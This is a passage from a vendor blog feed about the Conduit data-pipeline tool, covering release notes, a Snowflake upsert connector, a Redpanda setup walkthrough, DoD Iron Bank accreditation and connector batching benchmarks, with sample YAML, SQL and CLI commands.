version: 2.2  pipelines:    - id: gen-to-file      status: running      description: "A demo pipeline with wasm processor"      connectors:        - id: source-generator          type: source          plugin: builtin:generator          name: gen-source          settings:            recordCount: '3'            format.type: structured            format.options: id:int,name:string,addr:string,zip:string        - id: example.out          type: destination          plugin: builtin:file          settings:            path: ./example.out      processors:        - id: add-processed-field          plugin: standalone:simple-processor

You can see the new processor referenced in the processor's section of the pipeline.yaml

processors:    - id: add-processed-field      plugin: standalone:simple-processor

When we start Conduit and check the ./example.out file can see the processed records with the newly added "processed" field.

Not Just Standalone: Improvements to Built-in Processors

The introduction of standalone processors isn't the only highlight of Conduit 0.9. We've also made substantial enhancements to our built-in processors, making them more robust and user-friendly.

Exploring the Enhanced Built-in Processors

Here’s an example of a pipeline that uses two built-in processors. One processor removes a field and the other adds metadata to the record.

version: 2.0  pipelines:    - id: gen-to-file      status: running      description: "A demo pipeline with two built-in processors"      connectors:        - id: source-generator          type: source          plugin: builtin:generator          name: gen-source          settings:            recordCount: '3'            format.type: structured            format.options: id:int,name:string,addr:string,zip:string        - id: log          type: destination          plugin: builtin:log      processors:        - id: remove-zip          plugin: builtin:field.exclude          settings:            fields: ".Payload.After.zip"        - id: metadata-processed          plugin: builtin:field.set          settings:            field: .Metadata.processed            value: "true"

When we run the pipeline and check the Conduit logs there are three records printed. Our generator is creating records with id, name, addr, and zip fields but at the end of our pipeline, you can see that the record doesn’t have the .Payload.After.zip field. Additionally, there’s now a processed field in the .Metadata

{    "key": "ZGIwYzBlMTQtMDY4Yy00MTQ3LWExOWUtYjBmMGYwMjc1OWUy",    "metadata": {      "conduit.source.connector.id": "gen-to-file:source-generator",      "opencdc.readAt": "1711053477220315000",      "opencdc.version": "v1",      "processed": "true"    },    "operation": "create",    "payload": {      "after": {        "addr": "string 6932464d-d940-4e27-8139-f0175289fd24",        "id": 843620792,        "name": "string 549efa80-62f4-465d-9399-0129607fa40f"      },      "before": null    },    "position": "MzYzY2RlZTItZTlmNi00NWE4LWE2MDUtOGE0MGU5M2U1YmVk"  }

Just by themselves, our built-in processors provide a powerful set of primitives you can use to create sophisticated data processing pipelines.

Get Started with Conduit 0.9

We invite you to experience the advancements in Conduit 0.9 firsthand. Our getting started guide makes it easy to set up Conduit on your machine, allowing you to explore the new processor capabilities and more.

We Value Your Feedback

The new standalone processor support in Conduit 0.9 represents a major step forward in our commitment to improving data processing ergonomics. We're eager to see the innovative ways you'll utilize these capabilities.

Your feedback is crucial to us. Whether it's through posting issues, sharing thoughts in discussions, or connecting with us on Discord or Twitter, we're all ears.

For a comprehensive overview of all the new features and improvements, don't forget to check out the full release notes on the Conduit Changelog.

Streamlining Your Analytics: Building an Efficient Snowflake Data Pipeline for Upserts and Deletes

Anna Khachaturova — Thu, 21 Mar 2024 22:57:47 GMT

Snowflake's rise to prominence in data-driven companies is undeniable, yet many users encounter a common bottleneck: the challenge of real-time data ingestion, particularly when it comes to upserts and deletes. Snowflake's native data ingest services, such as Snowpipe and Snowpipe Streaming, fall short of offering these crucial capabilities directly. This is where the innovative Snowflake Conduit Connector steps in, bridging this critical gap by enabling safe and real-time upserts or marking records for deletion in Snowflake. This article takes a closer look at the development journey of the Snowflake Conduit Connector, offers a guide on setting it up, evaluates its data stream performance, and previews future enhancements.

Key Points

Performance of the Snowflake Conduit Connector
Covering the gap of features that Snowflake doesn't offer
How easily to deploy the connector
Our journey on building this connector

Filling the Feature Gap with Snowflake Conduit Connector

Snowflake's architecture revolutionized data warehousing with its cloud-native approach, but its real-time data manipulation capabilities needed a boost. The Snowflake Conduit Connector is designed to extend Snowflake's functionality, allowing for real-time data upserts and deletions, features eagerly awaited by many Snowflake users. This connector not only enhances Snowflake's capabilities but also ensures data integrity and timely data updates, critical for operational and analytical workloads.

Setting Up the Snowflake Conduit Connector: A Step-by-Step Guide

The Snowflake Conduit Connector empowers users to seamlessly integrate real-time data upserts and deletes into their Snowflake data warehouse. This guide provides a comprehensive walkthrough for setting up the Snowflake Conduit Connector, ensuring you can quickly leverage its capabilities to enhance your data management processes.

Step 1: Prerequisites

Before starting the setup process, ensure you have:

An active Snowflake account with administrative privileges.
Conduit installed locally

Step 2: Configuring Snowflake for the Conduit Connector

Create a Role and User for Conduit:
- Log into your Snowflake account.
- Execute SQL commands to create a dedicated role and user for Conduit, granting the necessary permissions for reading, writing, and managing data.

CREATE ROLE conduit_connector_role;
CREATE USER conduit_connector_user PASSWORD = '<strong_password>' DEFAULT_ROLE = conduit_connector_role;
GRANT ROLE conduit_connector_role TO USER conduit_connector_user;

Assign Permissions:
- Assign permissions to the Conduit connector role to access the specific database and tables where upserts and deletes will be performed.

GRANT USAGE ON DATABASE my_database TO ROLE conduit_connector_role;
GRANT USAGE ON SCHEMA my_database.my_schema TO ROLE conduit_connector_role;
GRANT SELECT, INSERT, UPDATE, DELETE ON ALL TABLES IN SCHEMA my_database.my_schema TO ROLE conduit_connector_role;

Step 3: Setting Up the Conduit Connector

Log into Conduit:
- Access your Conduit dashboard using your credentials.
Create a New Connector:
- Navigate to the "Connectors" section and click "Create Connector."
- Select "Snowflake" as the connector type.
Configure Connector Settings:
- Fill in the connection details for your Snowflake instance, including account name, user, password, and any specific configurations related to your setup.
- Specify the database and schema where the connector should perform creates, upserts and deletes.
Map Data Streams:
- Define the data streams that the connector will manage. Specify the source data and how it maps to the target tables in Snowflake.
- Configure the upsert and delete operations by defining the key columns and conditions.

Step 4: Launching the Connector

Review and Save:
- Review all settings to ensure they are correct.
- Save the connector configuration.
Activate Connector:
- Once the connector is configured, activate it to start processing data.
- Monitor the connector's performance and logs through the Conduit dashboard.

Step 5: Monitoring and Maintenance

Regularly check the connector's logs for any errors or performance issues.
Adjust configurations as necessary to optimize data processing.

Performance Insights: Streamlining Your Data Flow

One of the core advantages of the Snowflake Conduit Connector is its performance in handling data streams. Our development efforts were centered on ensuring the connector could manage high volumes of data with minimal latency, making real-time data ingestion, upserts, and deletes a reality. Here, we delve into performance metrics, showcasing the efficiency and reliability of the connector in various scenarios and highlighting how it stands up to the demands of modern data-driven operations.

Our Development Journey: Challenges and Victories

Developing the Snowflake Conduit Connector was a journey marked by both challenges and breakthroughs. From conceptualization to launch, our team navigated through intricate technical hurdles, all while keeping the user's needs at the forefront. We uncovered how other platforms produced results with missing data.

Some of the issues encountered during dev - As Snowflake provides no direct way of doing upserts we had to bench-test our own workarounds for uploading data. We made several attempts :

Uploading data via csv file to Snowflake, copying data from csv into temporary table, then merging it into final.
Uploading data via Avro file to Snowflake, copying data from Avro file into temp table, and then merging into final.

Sample Copy and Merge Query:

COPY INTO mytable_temp FROM @mystage FILES = ('myfile.avro.gz')
			 FILE_FORMAT = (TYPE = avro) MATCH_BY_COLUMN_NAME = CASE_INSENSITIVE PURGE = TRUE
			 
MERGE INTO mytable_final as a USING mytable_temp AS b ON a.id = b.id
			WHEN MATCHED AND ( b.meroxa_operation = 'create' OR b.meroxa_operation = 'snapshot' ) THEN UPDATE SET a.meroxa_updated_at = b.meroxa_updated_at
			WHEN NOT MATCHED AND ( b.meroxa_operation = 'create' OR b.meroxa_operation = 'snapshot' ) THEN INSERT  (a.meroxa_operation, a.meroxa_created_at, a.meroxa_updated_at, a.meroxa_deleted_at, a.data) VALUES (b.meroxa_operation, b.meroxa_created_at, b.meroxa_updated_at, b.meroxa_deleted_at, b.data) ;

Those above proved to be too slow, so we ended up going with this solution: uploading data in csv format, directly merging data from csv into the final table

Sample Merge Query On New Records:

MERGE INTO my_table as a USING ( select $1 meroxa_operation, $2 meroxa_created_at, $3 meroxa_updated_at, $4 meroxa_deleted_at, $5 data from @file/file.csv.gz (FILE_FORMAT =>  CSV_CONDUIT_SNOWFLAKE ) ) AS b ON a.id = b.id
			WHEN MATCHED AND ( b.meroxa_operation = 'create' OR b.meroxa_operation = 'snapshot' ) THEN UPDATE SET a.meroxa_operation = b.meroxa_operation, a.meroxa_created_at = b.meroxa_created_at, a.meroxa_updated_at = b.meroxa_updated_at, a.meroxa_deleted_at = b.meroxa_deleted_at, a.data = b.data,
			WHEN NOT MATCHED AND ( b.meroxa_operation = 'create' OR b.meroxa_operation = 'snapshot' ) THEN INSERT  (a.meroxa_operation, a.meroxa_created_at, a.meroxa_updated_at, a.meroxa_deleted_at, a.data) VALUES (b.meroxa_operation, b.meroxa_created_at, b.meroxa_updated_at, b.meroxa_deleted_at, b.data) ;

Also, to speed up the processing of data in our connector, we needed to split the stream of records (let's say we get 10k in one batch) into several chunks allowed us to use goroutines to parallelize the file generation + file uploading efforts when generating and writing to csv file.

While Snowflake allows you to define primary keys, they don't enforce them. That's a huge issue as it can result in duplicates on the primary key to be inserted. But we’ve taken care of that with deduping during our merge and csv file generation (we check in both places). Since there are no duplicates in a batch, and we have compacted the records in-order (say, if you have CREATE, then UPDATE for a record). This eliminates the single batch ordering requirement.

We also had to ensure that we were properly compressing and uploading files to not lose any data and that there isn’t an extensive wait time to upload.

Looking Ahead: Future Enhancements

The Snowflake Conduit Connector is a living project, with ongoing enhancements aimed at addressing the evolving needs of Snowflake users. We are committed to continuous improvement, drawing on user feedback and emerging data management trends to refine and expand the connector’s capabilities. The following list is just a few features that are on the horizon:

Multiple tables
Performance/compression improvements
Schema detection & versioning

Conclusion

The Snowflake Conduit Connector is more than just a solution to a problem; it's a testament to the power of innovation in the face of technical limitations. By enabling real-time upserts and deletes, this connector not only enhances Snowflake's capabilities but also empowers data-driven companies to manage their data more effectively and efficiently. As we continue to develop and improve the Snowflake Conduit Connector, we look forward to unlocking even greater possibilities for our users, ensuring their data pipelines are as dynamic and robust as the insights they seek to derive.

Conduit 0.8 is here

Simon Lawrence — Wed, 15 Nov 2023 15:52:13 GMT

We’re happy to announce the latest release of Conduit. While previous releases of Conduit have focussed on particular features for this release we’ve made our focus performance. Our goal is to make Conduit the default tool for data movement and being able to handle workloads that demand high levels of throughput is critical to achieving that goal.

We’re happy to report that we’ve been able to boost performance by over 2.5x to almost 70k msg/s through a single kafka-to-kafka pipeline. We achieved this performance increase with various improvements to the core of Conduit itself and to our Kafka Connector as well.

Future work

We’ve made great strides in improving Conduit’s performance but there are still additional improvements we’re eyeing. One of the most promising areas is micro-batching. With micro-batching N records are combined into a single record for processing and then split into N records again for writing to the destination. With this experimental batching work we’ve been able to push almost 250K msg/s through a single pipeline. This is really exciting and shows just how much more room the team has to improve performance.

If you’d like to check it out the experimental work on micro-batching can be found in a branch in the Conduit repo.

We’d love your feedback!

As always, we’d love to hear from you. Post issues, share your thoughts in discussions or join us on Discord or Twitter.

Check out the full release notes on the Conduit Changelog.

Real-Time, Real Fast: Supercharging Data Pipelines with Conduit & Redpanda

DeVaris Brown — Wed, 06 Sep 2023 16:45:56 GMT

In today's rapidly evolving data landscape, achieving seamless data integration and high-performance stream processing has never been more critical. While Apache Kafka and Kafka Connect have long been the go-to solutions for many organizations, they often come with a steep learning curve and an intricate ecosystem that can slow down development cycles.

Enter Conduit and Redpanda: a match made in data streaming heaven. Conduit's intuitive, developer-friendly platform joins forces with Redpanda's lightning-fast, Kafka-compatible data streaming engine to offer an alternative that's not just easier to use, but also significantly outperforms traditional setups in terms of throughput and latency. From simplified configurations and resource-efficient architecture, the Conduit-Redpanda combo makes data integration and stream processing faster, smoother, and more scalable than ever before.

The Pain Points of Kafka and Kafka Connect

Navigating the world of Kafka and Kafka Connect often feels like walking through a maze of complexities. Right from the start, you're faced with a steep learning curve and intricate configurations, but that's just the tip of the iceberg. What's lurking below the surface are the real monsters: infrastructure and performance challenges. Setting up and maintaining a Kafka cluster requires not just expertise but also significant system resources. The platform's high CPU and memory consumption can put a strain on your infrastructure, causing performance bottlenecks that are tough to resolve.

And while Kafka Connect brings the promise of simplifying data integration tasks, it comes with its own set of challenges that can quickly turn into downsides. One glaring issue is its intricate configuration process. Even simple integrations often require verbose and complex JSON configurations, making the initial setup a time-consuming affair. Additionally, Kafka Connect's scalability and performance don't always meet the mark, especially when handling large volumes of data. The system's resource consumption can escalate quickly, necessitating a beefy infrastructure to maintain optimal performance. This leads to added costs and complexity, eroding the supposed ease-of-use that Kafka Connect aims to offer.

Conduit + Redpanda: A Perfect Pairing

Redpanda is a Kafka replacement written from the ground up in C++ and Conduit is a Kafka Connect replacement built in Go. Neither one of the platforms have dependencies on the JVM or Zookeeper to move data and are Kafka wire protocol compliant. Conduit's UI eliminates the need for verbose configurations, streamlining the data integration process. Additionally, Conduit has an already established and growing list of open source connectors and a Connector SDK with an accompanying suite of tests that enables you to write your own high-quality, performant custom connectors. Redpanda outperforms Kafka in terms of speed and latency while consuming fewer system resources. This allows for a more efficient utilization of hardware, reducing operational costs. Both tools are designed with a focus on developer experience, making it easier to set up, manage, and scale data streams. Together, Redpanda and Conduit provide a more performant, resource efficient, and developer friendly alternative to Kafka and Kafka Connect.

Getting Started

To show you how easy it is to get started with Conduit and Redpanda, we’re going to build a simple pipeline that generates random information from a builtin Conduit connector into a Redpanda topic. Conduit will consume that information and output it into a file.

Installation

Installing Conduit and Redpanda is pretty simple. Follow the step-by-step guides (Conduit Guide,Redpanda Guide) to get your data streaming in no time. We’re going to use the Redpanda CLI, rpk, to create topics, producers, and consumers. Follow the instructions to download and install for your specific environment.

Running Redpanda and Creating a Topic

Start the Redpanda cluster

$ rpk container start -n 3 # creates a 3-node cluster

Create a topic named conduit-demo

$ rpk topic create conduit-demo # creates a topic

To test if everything is working open up a new terminal window(you should have two open right now). In the new window run:

$ rpk topic consume conduit-demo --brokers <broker1_addr>,<broker2_addr>...

In the original window run the following command. Type text into the producer window as shown in the picture below

$ rpk topic produce conduit-demo --brokers <broker1_addr>,<broker2_addr>...

You should see the following:

Configuring and Running the Conduit Pipeline

You can build pipelines three ways with Conduit: built-in UI, API, and using pipelines configuration files. For this example, we’ll use the pipeline configuration files. For more detailed specs on all the configuration options for pipeline configuration, you can look at the docs and reference each of the specific connector configuration options in their respective Github repos.

Create a folder called pipelines at the same level as your Conduit binary. Inside of that folder create a file named rand-rp-file.yml
Copy the following code block into rand-rp-file.yml

version: 2.0  pipelines:    - id: randorpfile # Pipeline ID [required]      status: running # Pipeline status at startup (running or stopped)      description: random generator to file using redpanda      connectors: # List of connector configurations        - id: rando_src # Connector ID [required]          type: source # Connector type (source or destination) [required]          plugin: builtin:generator # Connector plugin [required]          settings: # A map of configuration keys and values for the plugin (specific to the chosen plugin)            format.type: raw # This property is specific to the generator plugin            format.options: "id:int,email:string" # This property is specific to the generator plugin        - id: rp_dest # [required]          type: destination # [required]          plugin: builtin:kafka # [required]          settings:            servers: "<broker1_addr,broker2_addr,broker3_addr>" # [required]            topic: conduit-demo # [required]        - id: rp_src # [required]          type: source # [required]          plugin: builtin:kafka # [required]          settings:            servers: "<broker1_addr,broker2_addr,broker3_addr>" # [required]            topic: conduit-demo # [required]        - id: file_dest # [required]          type: destination # [required]          plugin: builtin:file # [required]          settings:            path: ./output.txt # [required]

Run the Conduit server from your terminal:

$ ./conduit

Navigate to http://localhost:8080 to check Conduit's UI and you should see the following:

You can view the data flowing through the Redpanda topic by opening up a new terminal window and running the following command:

$ rpk topic consume conduit-demo --brokers <broker1_addr,broker2_addr,broker3_addr>

If everything works correctly, viewing the contents of output.txt should show the same information in the topic.

Conclusion

Conduit and Redpanda offer an alternative that is not only easier on your development team but also on your infrastructure. They eliminate the operational overhead and complexity, freeing you to focus on what really matters—your data and how it drives your business. So if you're looking to make the switch to a more efficient, developer-friendly platform, look no further. Conduit and Redpanda are not just the future of data streaming; they're the smarter choice for today.

Additional Resources

For more information, visit the Conduit Documentation and Redpanda Documentation. Join our community forums to stay up-to-date and get answers to all your questions.

Conduit Accredited in Iron Bank DoD Centralized Artifacts Repository

Kevin Marsh — Mon, 28 Aug 2023 15:55:31 GMT

In our ongoing efforts to support the U.S. Department of Defense (DoD) with high-performing products and services, we were confronted with an operational challenge. Each time we started a new project, Conduit, our open-source data integration tool had to undergo a thorough security review process, a requirement dictated by the DoD's stringent security standards for all vendors. This caused considerable delays to the start of each new project we were involved with and hindered our ability to secure new projects within the department.

We needed a solution to expedite the availability of Conduit and make project initiations more efficient. Therefore, we decided to submit Conduit to a trusted repository run by Iron Bank, a government contractor.

Having successfully gone through the rigorous testing by Iron Bank, Conduit has bypassed the lengthy and recurring security review processes that would happen on individual engagements with different groups in various agencies. As a result of Conduit's full compliance by Iron Bank, Meroxa can now give the DoD access to this essential tool right away, significantly speeding up project operations.

Read on to learn more about Iron Bank’s security clearance process and what it says about the security of Conduit.

What is Iron Bank?

Iron Bank is a DoD repository of digitally signed, binary container images including both Free and Open-Source Software (FOSS) and Commercial Off-The-Shelf (COTS) software. It is a centralized repository for container images that have been hardened and evaluated for security. This makes it easier for DoD organizations to find and use secure container images, and to quickly and easily deploy applications. Approved containers in Iron Bank have DoD-wide reciprocity across all classifications, accelerating down to weeks a security process that can otherwise take months or even years.

Why Go the Iron Bank Route?

The DoD was interested in using Conduit to build connections within the Department of the Air Force (DAF) Data Fabric and between disparate systems to bridge gaps. However, Conduit had not been through the specific group’s software review and compliance process, which could have taken months to complete…months we didn’t have. To move forward rapidly and to set Meroxa up for success in the future, placing Conduit in Iron Bank made the most sense. By going the Iron Bank route, we were quickly able to get Conduit in Iron Bank and subsequently scanned and approved for use with flying colors in under a week.

Another benefit of having Conduit in Iron Bank is accessibility - being able to direct other DoD teams to an approved version of Conduit that they can download and use the same day without issue is a game changer. Long gone are the days of us going through various different approval processes for different projects to get the same outcome.

In addition to what was mentioned above, here are some other benefits to having your software in Iron Bank for the purpose of working with the DoD:

Increased security: Iron Bank container images are hardened and evaluated for security, which helps reduce the risk of vulnerabilities being introduced into DoD applications.
Increased efficiency: Iron Bank centralizes the process of finding and using secure container images, which saves DoD organizations time and resources.
Reduced risk: Iron Bank helps reduce the risk of DoD applications being compromised by vulnerabilities.
Improved compliance: Iron Bank helps DoD organizations comply with security regulations.

With those benefits in mind, you can see how having our offerings in Iron Bank would bring our customers peace of mind and allow both parties to not spend huge amounts of time and money on software reviews and testing.

Strengths of Conduit

We’ve touched a bit on how we’re using Conduit in the DoD to build data pipelines with the DAF Data Fabric, but I wanted to list out some other reasons why the DoD has opted to use Conduit in lieu of other products.

Efficient Binary Protocol - Uses a binary encoding format that is smaller and faster to serialize and deserialize compared to other formats. This makes it an efficient choice for transmitting large amounts of data.
Bi-directional Stream Support - The client and server can read and write messages in any order, as the two streams are independent.
Resilient Connectivity - Conduit is able to provide and maintain an acceptable level of service in the face of faults and challenges to normal operation.
Rate Limiting/Traffic Shaping - Controls the flow and distribution of traffic from the internet so your infrastructure never becomes overloaded and risks failing.
End-to-End Encryption - Keeps communications secure.
Lightweight - Can be compiled down to a binary that’s single-digit megabytes and connectors use megabytes of RAM. In comparison, Kafka Connect is roughly 500 - 600 megabytes for all of the packages, connectors, etc. For example, a single Postgres, can consume close to a gigabyte of RAM on its own.

With all of the benefits of Conduit plus the assurance of knowing that it’s a secure and compliant piece of software, it’s clear why the government has opted to use us.

If you are a developer working for the Department of Defense and need access to Conduit, you can download it from Iron Bank and install it right into your development environment. Federal government agencies and DoD DevSecOps teams always have access to the latest, accredited version of Conduit, which has been fully vetted and approved for deployment by the DoD Iron Bank DevSecOps team. For those outside of the DoD who are interested in Conduit, visit conduit.io here to download and view documentation on how to use Conduit.

Harnessing the Power of Batching in Conduit Connectors

Lovro Mažgon — Wed, 23 Aug 2023 18:10:20 GMT

The performance of Conduit data pipelines directly depends on the efficiency of connectors. As the ecosystem of Conduit connectors expanded across various data resources, we recognized the need for a robust and scalable solution that could boost performance uniformly across all connectors. In this blog post, we explore the impact of implementing batching in the Conduit connector SDK, which emerged as the perfect solution promising to elevate the performance of our connectors to the next level.

While our motivation was to enhance the performance of any destination connector, we selected the Postgres connector as a focal point to showcase the results that batching could deliver. Batching unlocked the true potential of the connector, improving the processing rate by a factor of 20. Bear in mind that similar improvements can be expected in other connectors.

Understanding Batching

The efficiency of record processing plays a critical role in the overall performance of data pipelines. Batching is a powerful technique that can significantly improve connector performance. In this section, we delve into the concept of batching, its inner workings, and the benefits it brings to data processing.

What is Batching?

Batching involves grouping multiple data records together and processing them as cohesive units. Instead of handling individual records one by one, batching allows us to bundle operations, such as database queries or API calls, into a single larger request.

The beauty of batching lies in its ability to reduce the overhead incurred by processing individual requests separately. By aggregating multiple requests into a single batch, we significantly reduce the number of round trips between the connector and the data resource, minimizing the latency associated with each operation.

Benefits of Batching

Batching offers wide-ranging benefits:

Reduced network overhead: Batching considerably reduces the number of network requests, lowering the overall network overhead and enhancing the efficiency of data transmission.
Improved throughput: Batching enables connectors to process a larger volume of data requests simultaneously, boosting the overall throughput of data pipelines.
Reduced latency: This one may be counter-intuitive, but batching can actually reduce the latency when the rate of produced records gets closer to the limit of the non-batching approach. Fewer round trips between the connector and the data resource result in a higher throughput thus reducing the average latency.
Enhanced scalability: By optimizing the processing of multiple records in batches, the connector becomes more scalable as it reduces the pressure on the destination resource.
Resource optimization: Batching reduces the strain on system resources, allowing for more efficient utilization of server capacity, computing power and network bandwidth.

Versatility of Batching

One of the key advantages of batching lies in its adaptability across various types of connectors and resources. Whether connecting to relational databases like Postgres, NoSQL databases, APIs, or other data systems, batching can be applied as a unifying performance enhancement strategy regardless of the data resource.

Implementing Batching in the Connector SDK

In this section, we delve into the nitty-gritty of implementing batching in the Connector SDK. We will explore the technical intricacies, design considerations, and challenges faced during this process.

No breaking changes

*“Forethought spares afterthought.” -*Amelia E. Barr

When we designed the Connector SDK interfaces, we had the foresight that there would come a time when implementing batching would be crucial for achieving optimal performance in destination connectors. Therefore, we laid the groundwork by preparing the interface to handle batches, even though the SDK initially only provided a single record per batch. This forward-thinking approach allowed us to seamlessly implement batching in the Connector SDK without the need for breaking changes.

The interface draws inspiration from Go's io.Writer and provides developers with a familiar and intuitive way to work with batches. Here's the relevant interface definition:

type Destination interface {
    // Write writes len(r) records from r to the destination right away without
    // caching. It should return the number of records written from r
    // (0 <= n <= len(r)) and any error encountered that caused the write to
    // stop early. Write must return a non-nil error if it returns n < len(r).
    Write(ctx context.Context, r []Record) (n int, err error)
}

This interface makes the Connector SDK responsible for collecting records into batches, allowing the behavior to be centralized and tested without the need to repeat it in individual connectors.

Batching middleware

In the Connector SDK documentation we encourage developers to include the default middleware unless they have a very good reason not to. Most connectors therefore benefit from new middleware as soon as they update to a new SDK version. We used this to our advantage by adding a new batching middleware that enables the batching behavior in virtually all connectors.

Batching strategies

The middleware introduced in the previous section injects two parameters into the connector specifications:

sdk.batch.size - This option sets the maximum number of records in a batch. Once a record is added to the batch and the limit is reached, the whole batch gets flushed synchronously to the destination connector.
sdk.batch.delay - The maximum delay before an incomplete batch is written to the destination. The delay is measured from the time the first record gets added to the batch. This option essentially controls the maximum latency added to a record because of batching.

These strategies ensure users can tailor the batching behavior to suit their specific needs and optimize performance accordingly. If you are interested in the internals of these strategies you're welcome to take a look at the batcher implementation.

Transactional integrity and error handling

In Conduit, all records are strictly ordered. This guarantee extends to batches, where records in a batch maintain their order from the oldest (received first) to the youngest (received last). The connector is free to decide if it wants to store all records in a single transaction or treat them independently, however, it needs to write the records in the correct order. This means that, in the event of a failure, a connector can fail to write part of the batch, as long as there's an index that divides the batch into two parts: successfully written records should be to the left of that index, while failed records are to the right.

In case of a failure the connector can return the number of successfully written records and an error. The SDK will positively acknowledge the first n records and use the error to negatively acknowledge the rest. Only if the number of successfully written records matches the size of the batch, is the write considered completely successful.

If the connector follows this behavior, Conduit is able to guarantee the correct order of records in the data pipeline and at-least-once delivery of all records.

Benchmarking using the Postgres Connector

With the batching implementation in place, it was time to put it to the test. We conducted benchmarks using the Postgres connector to evaluate the impact of different batch sizes on throughput and latency.

Configuring the pipeline

We decided to run a simple pipeline that uses the built-in generator connector as the source and the Postgres connector as the destination. The generator constantly produces records as fast as possible, which makes the throughput of the pipeline completely dependent on the throughput of the destination connector.

We tested the pipeline with different batch sizes, from 1 (no batching) to 10, 100, 1,000 and 10,000.

Here is the configuration file for the pipeline:

version: 2.0
pipelines:
  - id: generator-to-pg
    status: running
    connectors:
      - id: gen
        type: source
        plugin: builtin:generator
        settings:
          format.type: structured
          format.options: "id:int,first_name:string,last_name:string"
      - id: pg
        type: destination
        plugin: builtin:postgres
        settings:
          url: "postgres://meroxauser:meroxapass@localhost:5432/meroxadb?sslmode=disable"
          table: "batch_test"
          # Tested batch sizes: 1 (no batching), 10, 100, 1000, 10000.
          sdk.batch.size: 1000
          # Batch delay is not relevant, records are constantly produced and
          # flushed before the delay is reached.
          sdk.batch.delay: 1s
    processors:
      # The generator produces a raw key, we use a processor to hoist it
      # into a structured payload, needed by the Postgres connector.
      - id: hoist
        type: hoistfieldkey
        settings:
          field: "key"

We also prepared the table in the target database in advance:

CREATE TABLE batch_test (
  id int,
  first_name varchar(255),
  last_name varchar(255),
  key varchar(255)
);

Collecting metrics

When running the pipelines we were collecting and monitoring Conduit metrics using Prometheus and Grafana. We mainly focused on the metric conduit_pipeline_execution_duration_seconds. This is a collection of metrics that together represent a Prometheus histogram tracking the duration a single record spends in the pipeline, from the time it is received by the source to the time it is acknowledged by the destination.

We monitored the metric using two Grafana graphs:

A heatmap showing the end-to-end latencies of records traveling through the pipeline.
A time series line graph showing the throughput of the pipeline in records per second over time.

If you are interested in graphing these values for your Conduit instance have a look at conduitio-labs/prom-graf, a simple project that provides the necessary services and pre-configured dashboards.

Results

We ran the benchmarks on a 2019 MacBook Pro with a 2,3 GHz 8-Core Intel Core i9 processor and 32GB RAM. Each pipeline ran for exactly 1 minute on a clean slate (fresh database and fresh Conduit instance).

The results speak for themselves:

Here is the same data represented in a graph:

Throughput

We can observe the throughput starting at 822 records per second with batching disabled and increasing to over 16,000 records with a batch size of 10,000. That's an increase of throughput by a factor of 20!

The biggest jump in throughput can be seen in the first step when we increased the batch size from 1 to 10. It improved the performance of the pipeline by a factor of 6.5. The next step going to 100 further improved the performance by a factor of 2.4. Further increases of the batch size still had a noticeable effect, although not as extreme as the first two steps.

Latency

The common assumption might be that batching inherently increases latency, as records are held to be flushed together. This holds true when the incoming record stream is relatively slow. However, as the workload increases, the latency can rise sharply when records start waiting on previous ones to be flushed. In such scenarios, batching can actually reduce latency while improving throughput by minimizing these waiting times.

This graph demonstrates when batching can improve the latency:

This is exactly what we observed in our results. Enabling batches with a batch size of 10 dropped the latency from 13.7ms to 3.5ms. Further increases in the batch size also increased the latency, as bigger batches naturally increase the time it takes to collect a batch and flush it. A batch size of 100 still had a lower latency compared to the pipeline without batching, although we observed a sharp increase of the latency for batch sizes 1,000 and 10,000.

Conclusion

The benchmark results conclusively demonstrate that batching plays a pivotal role in improving the performance of our connectors. With larger batch sizes, we achieved substantially higher throughput and in some cases even lower average latencies, which translates into faster data processing overall.

We found that the optimal batch size for significant performance gains was around 100. At this batch size, the throughput showed a notable increase compared to the non-batching configuration (>15x), and the average latency was halved. While larger batch sizes continued to enhance pipeline throughput, they also incurred higher latency, thus the decision to use a higher batch size would depend on the priorities of the specific use case. If higher throughput is more important than low latencies, higher batch sizes would still be applicable.

The decision on what batch size to use is ultimately in your hands as the user. It will depend on different factors like the expected amount of records per second, the size of the records, the spikiness of the load, what latency is acceptable, etc. You need to carefully think about these factors and, if possible, gather actual information about the incoming data stream to make an educated decision about the appropriate batch size.

Final thoughts

Looking back on our decision to implement batching, we recognize that it has positioned the Connector SDK for the future. Batching provides the scalability, efficiency and flexibility needed to handle high-load pipelines. With this feature, we are able to lower the latencies as well as increase the throughput in virtually every destination connector across the board.

We encourage you to try out Conduit and let us know what you think!

Conduit 0.7

Rimas Silkaitis — Wed, 19 Jul 2023 04:15:00 GMT

Welcome to another release of Conduit! We’ve always thought of Conduit as a Kafka Connect replacement that could do so much more, like move data and run elaborate pipelines. In this release, we get closer to that original goal of a Kafka Connect replacement with our biggest feature, Native Schema Registry support.

Native Schema Registry Support

A schema registry is a great tool to store metadata about the information flowing through pipelines. The metadata can contain information about what fields are required, which fields are optional, and enforce data types. Also, the data in a pipeline can be encoded in a more space efficient format if you have a schema. As a developer, this allows you to be more confident that what gets sent into the pipeline is what you’re expecting.

We’re excited to announce native schema registry support in Conduit. Interacting with a schema registry within a Conduit pipeline is done via one of four built-in processors:

-Decode with Schema Key

-Decode with Schema Payload

-Encode with Schema Key

-Encode with Schema Payload

To add the ability to your pipeline, all you need to do is call one of the aforementioned methods in your pipeline within the processors section:

processors:
  id:   example
  type: decodewithschemakey
  settings:
    url:                 "http://localhost:8085"
    auth.basic.username: "user"
    auth.basic.password: "pass"
    tls.ca.cert:         "/path/to/ca/cert"
    tls.client.cert:     "/path/to/client/cert"
    tls.client.key:      "/path/to/client/key"

Currently, the built-in schema registry processors only supports Avro but we’re looking to include more formats in future releases, like protobuf and JSON schema.

gRPC Connector

While not necessarily part of Conduit itself, we’re excited to announcegRPC Server andClient Conduit connectors. This is super interesting because it now allows Conduit to be used in distributed environments. For example, let’s say you need to aggregate in one place and forward it to another site.The image demonstrates that you can have one Conduit running on Remote Site A and using the Conduit gRPC Server and Client Connectors, you can forward the data to Remote Site B. This is functionality we use internally to move data between regions within AWS. There are still a number of features to be added to these connectors, but it’s a start at enabling these distributed scenarios.

We’d love your feedback too!

As always, we’d love to get your feedback! If you want to see the full list of what is included in this release, check out the Conduit Changelog and the documentation. Also, feel free to join us on Discord or Twitter.

Building Streaming Data Connectors Faster with OpenAI’s GPT-4

William Hill — Fri, 02 Jun 2023 13:53:16 GMT

